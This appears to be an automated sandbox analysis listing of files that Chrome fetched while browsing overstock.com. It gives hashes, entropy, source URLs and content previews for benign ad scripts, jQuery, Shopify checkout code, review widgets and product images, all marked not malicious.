                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):11717
                                                                                                                                                                                    Entropy (8bit):5.721170826678287
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:qAshXMRyW6VwXHUE/5PrBepDICl/eQTiHoKIAPIbDBcoscoOVBhyi9PfXgOx:dshXMRyW73Uy9rBeprZqHoK9yJBhy0fp
                                                                                                                                                                                    MD5:4FF5D6E4E201F94BA7C254474CD74EAB
                                                                                                                                                                                    SHA1:CF6062EA88EB7F401E8F91CD1364257AEBA3A155
                                                                                                                                                                                    SHA-256:01C6DAA2ADBEDE3FF02E95AF7F9246908A9926CA2814E9B014A11B1585DCAB7E
                                                                                                                                                                                    SHA-512:8B156284A2AE71D5D5C9216C40A7DD049221D52EF3B3E3C87AF6FF72E629B94311359975DD9AA3B8C94038418D97CB2EFA1A863D7781C3028516E3E091A2C03C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:./* */try { eval('(function() {var qss="&cb="+Math.floor(99999999999*Math.random());try{qss+="&ref="+encodeURIComponent(document.referrer)}catch(e){}try{qss+="&sc_r="+encodeURIComponent(screen.width+"x"+screen.height)}catch(e){}try{qss+="&sc_d="+encodeURIComponent(screen.colorDepth.toString())}catch(e){}var callDis=function(e,t,n,o){function c(){callDisInternal(e,t,n,o)}"complete"===document.readyState?setTimeout(c):window.addEventListener?window.addEventListener("load",c,!1):window.attachEvent("onload",c)},disCalled=!1,callDisInternal=function(e,t,n,o){disCalled||(disCalled=!0,n=(n?"https:":"")+"//"+t+"/dis/dis.aspx",(t=document.createElement("iframe")).width=t.height="0",t.style.display="none",t.setAttribute("sandbox","allow-same-origin allow-scripts"),t.setAttribute("aria-hidden","true"),t.title="Criteo DIS iframe",void 0!==o&&""!==o&&(document.body.appendChild(t),null!=t.contentDocument)?(t.contentDocument.open(),t.contentDocument.write(o),t.contentDocument.close()):(t.src=(n+
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65451)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):89476
                                                                                                                                                                                    Entropy (8bit):5.2896589255084425
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                                                                                    MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                                                                                    SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                                                                                    SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                                                                                    SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                                                                                                                                                                    Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):145
                                                                                                                                                                                    Entropy (8bit):4.633912279815908
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnBF0DJccOfeQJYKb64YKiVAQVQsLVn:YWtIkW/fAnBFCccOpJ/l/YPLVn
                                                                                                                                                                                    MD5:6BB886ADDEC2D98B25238D2128E0FEA1
                                                                                                                                                                                    SHA1:384802E9ECE505DDF789BE12B1F12D06DFC26C1B
                                                                                                                                                                                    SHA-256:810D8FEBB7CAFC5D270CECC3D14D6998F063CB9CA5FD91C1579390B9B8E51AF7
                                                                                                                                                                                    SHA-512:071A886C3E60EF7728BFA97338355DF05F8130C707749939190F8FE73A4DC681495EA2673B526FCD79AEE88C10931C272AEC3E03F6AFB14EDAC39490C6FE6C6E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/33044741/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"33044741","rollup":{"average_rating":4.41,"rating_count":39,"review_count":39,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (6825)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6828
                                                                                                                                                                                    Entropy (8bit):5.287195105875283
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:4QETQVhtptTK/bZ6vJ1t8S2nU4qe6xq17cwqz5LflU:4QETQVhVTKgwnqhxC7cwqTU
                                                                                                                                                                                    MD5:D203E1FFFCFA48846B09CD7AD4FF0E86
                                                                                                                                                                                    SHA1:653FE82DBCB2FFA463A2307D580C99537CFC938F
                                                                                                                                                                                    SHA-256:5FCCB6179FF4FFD606C30DBE452C54368D2B14A1CFA92D4E59A7DFD97E9EDD6F
                                                                                                                                                                                    SHA-512:4EC9BDFA36C04232E107322EF1D27FF7E097E5DEEC6D16377005C350ECBABD8DED9117B84CC585B71E49F333DC68406EEB37A9FA0722F5B2C53D280AF12CB76E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/context.C2MjukUF.js
                                                                                                                                                                                    Preview:import{eJ as M,lN as k,at as B,c0 as m,cx as c,p9 as A,hS as h,pa as T,pb as V,T as _,pc as N,pd as C,lW as O,lX as q,lP as U,hX as j,a as F,bt as x,jf as w,e as v,eQ as Y,dE as G,d3 as H,f4 as z,iM as R,hR as S,ms as L,pe as J,iP as W,dt as X,q as D,iK as $,dD as K,dO as Q,pf as Z,pg as ee,dw as te,hE as ne,dv as se,ib as ae,cK as re,d as y,J as ie,eW as oe,A as de,cM as I,y as E,mk as le,gj as ue}from"./app.DfgMZONA.js";const Ie=()=>{const e=M(),t=k(),n=B().paymentLines.value,s=m(c.userStoredPaymentMethods),r=m(c.selectedPaymentMethod);if(e)return t?.payment?pe(r,s):ce(n)},ce=e=>{if(e?.length)return A(e)?"IDEAL":"CREDIT_CARD"},pe=(e,t)=>{if(!(!e&&!t.length))return e&&h(e)||T(t)?"IDEAL":"CREDIT_CARD"},Ee=()=>{const e=V();return _(()=>e===N.ShopPayExternal?C.ShopPayExternal:C.CheckoutOne,[e])};function ge(){const e=M(),t=O(),n=q(),s=U(["CUSTOM","STORE_CREDIT"]);return!e||t||n||s}function Me({children:e,closeButton:t,...n}){const r=j()?"fill":void 0;return F(x,{blockSize:r,size:"auto",.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (18626), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18626
                                                                                                                                                                                    Entropy (8bit):5.517606906817877
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:2uWbLyUE6D+rbQoyfD7z8h+77dCM+WiNjmuhJml:2/buUEOShmD7I2iBMl
                                                                                                                                                                                    MD5:2D408EE209FC9F33A09207CD14AD0C06
                                                                                                                                                                                    SHA1:A4B990F48AC5C28C7CF7BD50D426156390564AA4
                                                                                                                                                                                    SHA-256:4C9C0BB4D19404311ACCBCC0ADDC13775F691E0288E4175FE460AD426A0326A3
                                                                                                                                                                                    SHA-512:92B5C757E3A0FF851D79E3D91755E39B1E3A0E2CDAECCADF9D0398567FB839AB40E643BADBCD27FEA7C8AF1AF007DC13695B2544D61FC356DEAC97A75C0549D3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.681.chunk.4c9c0bb4d19404311accbcc0addc13775f691e0288e4175fe460ad426a0326a3.js
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[681],{2675:function(e,t,n){n.r(t);var r=n(8081),a=n.n(r),l=n(3645),i=n.n(l)()(a());i.push([e.id,".cl-link {\n color: #2f3337;\n font-size: 14px;\n text-decoration: underline;\n}\n.cl-link:hover {\n color: #000;\n}\n.cl-link-inline {\n color: inherit;\n font-size: inherit;\n}\n.cl-link-icon {\n align-items: center;\n display: flex;\n text-decoration: none;\n}\n",""]),t.default=i},5454:function(e,t,n){var r=n(5318);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var a=r(n(7154)),l=r(n(6479)),i=r(n(4184)),o=n(5697),u=r(n(8661)),f=["accentFill","children","className","fill","height","stroke","title","viewBox","width"],c=function(e){e.accentFill;var t=e.children,n=e.className,r=e.fill,o=e.height,c=e.stroke,s=e.title,d=e.viewBox,h=e.width,v=(0,l.default)(e,f);return u.default.createElement("svg",(0,a.default)({className:(0,i.default)("cl-icon",n),fill:r,height:o,stroke:c,viewBox
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (40076)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):40078
                                                                                                                                                                                    Entropy (8bit):5.407581148922124
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:aHdEgUzXIc0AQxsdLCvqm4E0rVpxLLlujiJHoE2t3z6uv3kzF:iKXubYWqVEgVXfllt2RSF
                                                                                                                                                                                    MD5:687C0DF9902CD1A363868B46D5CF3383
                                                                                                                                                                                    SHA1:579103D81C0B895C793B0179626F6C4E6104888C
                                                                                                                                                                                    SHA-256:515AC896C79F65D4E36AA58A6F8BB085B52EBC8946CF50D8B72B79180268A58E
                                                                                                                                                                                    SHA-512:08257CF69D14F38CD6271D1933E69DE4FF91AF42B3E5628C9BDAE75D60987D2C76E62170299D38BBA41671212FA436E7B69B1ACFF317567FB8A1AAFBE00B9DEE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/polyfills.BVWgFUkR.js
                                                                                                                                                                                    Preview:var r="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=function(r){return r&&r.Math===Math&&r},e=t("object"==typeof globalThis&&globalThis)||t("object"==typeof window&&window)||t("object"==typeof self&&self)||t("object"==typeof r&&r)||t("object"==typeof r&&r)||function(){return this}()||Function("return this")(),n={},o=function(r){try{return!!r()}catch(t){return!0}},i=!o((function(){return 7!==Object.defineProperty({},1,{get:function(){return 7}})[1]})),a=!o((function(){var r=function(){}.bind();return"function"!=typeof r||r.hasOwnProperty("prototype")})),u=a,c=Function.prototype.call,f=u?c.bind(c):function(){return c.apply(c,arguments)},s={},p={}.propertyIsEnumerable,h=Object.getOwnPropertyDescriptor,l=h&&!p.call({1:2},1);s.f=l?function(r){var t=h(this,r);return!!t&&t.enumerable}:p;var y,d,v=function(r,t){return{enumerable:!(1&r),configurable:!(2&r),writable:!(4&r),value:t}},g=a,w=Function.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 1200 x 189, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):214486
                                                                                                                                                                                    Entropy (8bit):7.994784167646853
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:6144:gN0fx/tzdCnIbZY/vIRklz3iPkixHwW2uOoPo9yy:zZ/dC/vIWzY/lwNmPPy
                                                                                                                                                                                    MD5:F87E6B38547ADD99B945D89CFE7C9D21
                                                                                                                                                                                    SHA1:27B1972557C99F72ADA706A1706371C9E0A2E590
                                                                                                                                                                                    SHA-256:92E1362570B3F9C564353261EF1975B92B92BEB6B671DE933D2AAADA5FB60A66
                                                                                                                                                                                    SHA-512:C213288C4A6EAC6C3C3D45241F036AD5BF776EFB0E9364A14A07B3E99AB598EC257C4177EA5A6DAD913270E99D1F02B430825B85786852C9544858C4BA7B53EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.PNG........IHDR.....................iCCPicc....c``\...[.$....WR........~...A...A..21...1 ...'.v...D_....@..LI-Nf``......\PT...........```.)...b``....!...;...V..............NBbC....d..Ld.$...A.R.....O2'.N....&`/.(m..Qs....$7......U...g..._{..K...KR+J@.....@a..6...E..._...' .f20loe`....SY........<...M...Ft....eXIfII*...........................V...........^...(.......................i.......f.......x2......x2................0210....................0100........................................6..8....pHYs...%...%.IR$... .IDATx..M.d.u&.....~.....&...#.L6%q$y..$..I../.....1.0 [...`/$....x......c..=...c..l..d{."........W......{#..qo..W]M1......8.'".....>.)&"<..3..=.........v,j..g.4.b........x......:+v......?O...}L^w....>.w1.4.m.k.}..[.Q..3...9[....e...(.......C%..[1..d......7..1,E...`..Y..h...]!.......H........O.e....t...>...+..3...WJ...6~F4@x6..%...$.....,....].../X......&.6.....=.m.....u..9..C..<...9{... fff...3.q.9.r...t.).q...a..,.D./.p..=.....S.;.<..P
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x650, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):133312
                                                                                                                                                                                    Entropy (8bit):7.984605300071625
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:S1gPFA9KhA+dnlfuwankz2jThFzTrrppBzM26vaz5LUEAaYU:DFAKhA+dnlanu6brpjMnaVL9HYU
                                                                                                                                                                                    MD5:6E5408761FD00C308B39E9A4B1D91BD2
                                                                                                                                                                                    SHA1:B3798B31DC9D5DC1DBBA02E271A6F92A1337BAEB
                                                                                                                                                                                    SHA-256:D000EFF66514AFD7E9E3173DA97177C72645EA80400D32731CD1F25A89FA8D54
                                                                                                                                                                                    SHA-512:1C7D519B4213D97C7F7EE63D5C01EC845E5172B1CC8E56ED47661C2798E5422434C2878F6947E49C044C0F27992F1E9C6612176612F342E84E0128126E67AFCD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......................................................................................................@....@..... . .$. .....0.. .........H.......H.D.@...$H .....$.....H.....D.........ZwYJs...{.r..Vr.rt.LS.B...&rQ...i..|vs..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (336)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):458
                                                                                                                                                                                    Entropy (8bit):5.083093074926281
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:giPtydgJowCfMCgCfMClS4QaEoWH1ARMAsk7v:giPtyeJFLjLqsosCRZXr
                                                                                                                                                                                    MD5:642173BE054799A424915838F618D190
                                                                                                                                                                                    SHA1:C2EB119D3CDA65072343E80FC341116931E2CED3
                                                                                                                                                                                    SHA-256:2792BF612B0764521F758C6C458A332BF0F42F312C8D27EBE6F8F465FC0F3B45
                                                                                                                                                                                    SHA-512:3C63CEFCB0FF7C97A4843BB204FA4E722C3756F9BE9717B8B00D0BC58B4B82BB35BF46ED6EE1423E0CF2C477922502B352094118A2C62CDB27AB7BCEDB2FD7AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm/strict/app/web-pixel-shopify-app-pixel@0220.js
                                                                                                                                                                                    Preview:shopify.extend('WebPixel::Render', function (api) {. var analytics=api.analytics,browser=api.browser,init=api.init;. var e=api._pixelInfo?api._pixelInfo.runtimeContext:null,n=api._pixelInfo?api._pixelInfo.type:null;analytics.subscribe("all_standard_events",(function(i){var l,o;l=i.name,o=i,browser.localStorage.getItem("shopify-pixel-mode").then((function(i){"debug"===i&&console.log(`[shopify-pixel][${n}][${e}] ${l}`,o)})).catch((function(){}))}));.});.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):62111
                                                                                                                                                                                    Entropy (8bit):5.51116653266677
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLI2:qYW2Pj5yO7t2ACRg839837
                                                                                                                                                                                    MD5:0128753413D320761896E9FD66AFC6AE
                                                                                                                                                                                    SHA1:490DA439D2EEA205FEC9243043B293DDDA578181
                                                                                                                                                                                    SHA-256:76E622E3B35FC271F4089FFD2644F5D72D2576F612F334860148CDD7F5A3637A
                                                                                                                                                                                    SHA-512:C5FB8963D57B0FC5371C9ACEE6705A0E6AA99E6BB54C7DF0C347C44E504FCFAAF3AAA408E058698A21C7AEAB9FB040AB6EC64F954C42E6C2B4DBD3F2954BDE3B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (13953)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):14033
                                                                                                                                                                                    Entropy (8bit):5.601470180964666
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:cdoYT0bI0KUiOmx1xIi/UDZGhU7jRPz3kQ3AF:cdoYc3KtNxjP6Y2Rr3kmAF
                                                                                                                                                                                    MD5:5D36171932959461CCA408DD301231DE
                                                                                                                                                                                    SHA1:DA69F437F2D096FA231822C859B3C9C0E5541111
                                                                                                                                                                                    SHA-256:A9B8A9FA53615F63F7F38CE8116CBD2FEBC43C5D68C9E1BC00AB35851D263BD3
                                                                                                                                                                                    SHA-512:DFA0F888773E96824A06079FCE3311898CCD77AA8951E7F0A3441D7ECAFB2E359FB2B67F74F09666A534299001EE2B827174DAF85E6E836B86C089E4B5F5DECE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */."use strict";(self.pwrClg=self.pwrClg||[]).push([[310],{30310:(s,e,t)=>{t.d(e,{c:()=>S});var r=t(60756),i=t.n(r),a=t(84960),o=t.n(a),n=t(96631),l=t.n(n),p=t(43688),c=t.n(p),d=t(760),h=t.n(d),u=t(85668),m=t(6880),f=t(75224),g=t(48812),b=t.n(g),v=t(77e3),I=["iconInputId","onClickRating","onIconKeyDown","isRequired","onMouseEnter","filledPercent","label","children","accessible"];function y(s){var e=u.useRef((0,m.i0)()),t=s.iconInputId,r=s.onClickRating,i=s.onIconKeyDown,a=s.isRequired,o=s.onMouseEnter,n=s.filledPercent,l=s.label,p=(s.children,s.accessible),c=b()(s,I);return(0,v.jsxs)("span",{children:[(0,v.jsx)("input",{id:e.current,name:t,className:"sr-only",onClick:r,onKeyDown:i,"aria-describedby":c["aria-describedby"],required:!!a||void 0,type:"radio"}),(0,v.jsxs)("label",{htmlFor:e.current,onMouseMove:o,className:"pr-interactive-star-icon",children:[(0,v.jsx)(f.Q,{size:50,filledPercent:n,accessible:p}),(0,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (35788), with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):35806
                                                                                                                                                                                    Entropy (8bit):5.354321297607842
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:eruQgm8+OGIdHR3rUKOevLVgaJICkv8wxpKhm:que8F5ZR3oexxm
                                                                                                                                                                                    MD5:033CB53DBA312C88798BBA579FC68B40
                                                                                                                                                                                    SHA1:E6A645D3E0680302789C87BABFDDF1A742C7D64A
                                                                                                                                                                                    SHA-256:A1F8F7541A2982D7DF75F73D0234A3F2AFDC8302F361078F883D25A3A574BAE4
                                                                                                                                                                                    SHA-512:3CB56D5756C519F72AA24FDF1AC03298CD8010FB6A429A7439A8C19BF75C9C813EB8F224C2A31ECECA53C1EF0101FD74705ADAB86E464E616A0316F5C04DB8FA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return qe},get start(){return Ae},get stop(){return We},get track(){return Se}}),e=Object.freeze({__proto__:null,get clone(){return rn},get compute(){return an},get data(){return Ge},get keys(){return Ze},get reset(){return on},get start(){return en},get stop(){return cn},get trigger(){return nn},get update(){return un}}),n=Object.freeze({__proto__:null,get check(){return pn},get compute(){return vn},get data(){return Be},get start(){return fn},get stop(){return mn},get trigger(){return gn}}),r=Object.freeze({__proto__:null,get compute(){return On},get data(){return wn},get log(){return _n},get reset(){return xn},get start(){return bn},get stop(){return kn},get updates(){return yn}}),a=Object.freeze({__proto__:null,get callbacks(){return Tn},get clear(){return Cn},get consent(){return jn},get data(){return En},get id(){return In},get metadata(){return Sn},get save(){return Hn},get start(){return Nn},get stop(){ret
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (58876), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):58876
                                                                                                                                                                                    Entropy (8bit):5.405683338218142
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:buY9NdAkLYPFvFkxF94zPnSJpSFDKNo5/H:buQdApFoF94zPnSJpSFDP5/H
                                                                                                                                                                                    MD5:4328E910DE583AD53B3A7A76455AF005
                                                                                                                                                                                    SHA1:E040010E5EF4121A3A163AACDC664D6AA4AFEC74
                                                                                                                                                                                    SHA-256:D4963B8AFEBFA0063B5D17B4C80F49BCE702A37EA5C9B91BB3C996BB9DEA4B60
                                                                                                                                                                                    SHA-512:F807BA8B0AE2D5387E93E292918EEB4D7D1AC7635566A38EE2E101FBE8A7C6C23E704770EFCB1401EB5D1385605CBFB15F0A840AC150770049D2A4D6CA9A0DFA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(2480)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(e){var n;return t.prototype=e,n=new t,t.prototype=null,n}}(),a={},c=a.lib={},u=c.Base={extend:function(t){var e=o(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2982
                                                                                                                                                                                    Entropy (8bit):7.47033806606041
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:fIl/XflxRkTbeWJUGuMNEAURT0RrSEhTFQ5Py3Jty4gUNIfAoVLmzTzY2k:fIl/X9+ZUGfIRTTiRQ5iUUNIffVLms2k
                                                                                                                                                                                    MD5:F9070C437E1D6DFE67076CD7AA78E590
                                                                                                                                                                                    SHA1:947DDD7267A9294B6346AB5E9CD8D0FC066050FB
                                                                                                                                                                                    SHA-256:C010D86B007DE2B2EC98A7A88AE9738F837B99EC9C8EFD19269BCC4645736215
                                                                                                                                                                                    SHA-512:6D9847F3788DD8CA804047706E04D5C6D1135BAF62612942C6F9FB8636FC1C12E980B9C0C360657157D7AD4F71174742308B21944A454C04F384CE6B1463101E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_8e2f495e-cc09-4084-8f72-a7d4d00edfd0.jpg?v=1729322988&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....0&...*P.P.>1..B.!!..v. ....#...|.....$Pl.......OA..........."...U.E...g...7.7.........C....?.<....Q7_..h.....3..z?.y*...].}]=.=......8.M|..._._Q|.(....O.?R|.=G.w...w.....^....m.|...A(....(6..f{./.@.9F.y........Y..q....D....$ .......`..?..v....9SL.5.W.;_..5.B%+..8..O.38m.....L@t..2St.^..J.H./....p.. ......do...|.1..._.$&....H.s.n.....].$}E....=7(.......V.&l..K.....c.q...l>...H..............%....X.]u....&.{...H.[G..5l..6.....b...o..:.a......D..........`...s...... .4&.&.4.V..x...a@(..>.~K>H....;.^$.A.Of.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1979
                                                                                                                                                                                    Entropy (8bit):6.764515993061717
